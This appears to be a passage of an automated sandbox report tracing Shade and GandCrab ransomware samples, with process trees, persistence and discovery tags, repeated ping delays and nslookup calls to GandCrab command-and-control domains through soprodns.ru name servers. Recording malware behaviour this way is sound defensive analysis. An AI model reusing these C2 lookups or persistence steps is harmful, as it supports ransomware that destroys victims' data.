                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of UnmapMainImage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                nslookup nomoreransom.coin dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  nslookup nomoreransom.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    nslookup gandcrab.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    nslookup nomoreransom.coin dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      nslookup nomoreransom.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        nslookup gandcrab.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          nslookup nomoreransom.coin dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            nslookup nomoreransom.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              nslookup gandcrab.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                nslookup nomoreransom.coin dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                nslookup nomoreransom.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  nslookup gandcrab.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    nslookup nomoreransom.coin dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      nslookup nomoreransom.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        nslookup gandcrab.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          nslookup nomoreransom.coin dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            nslookup nomoreransom.bit dns2.soprodns.ru
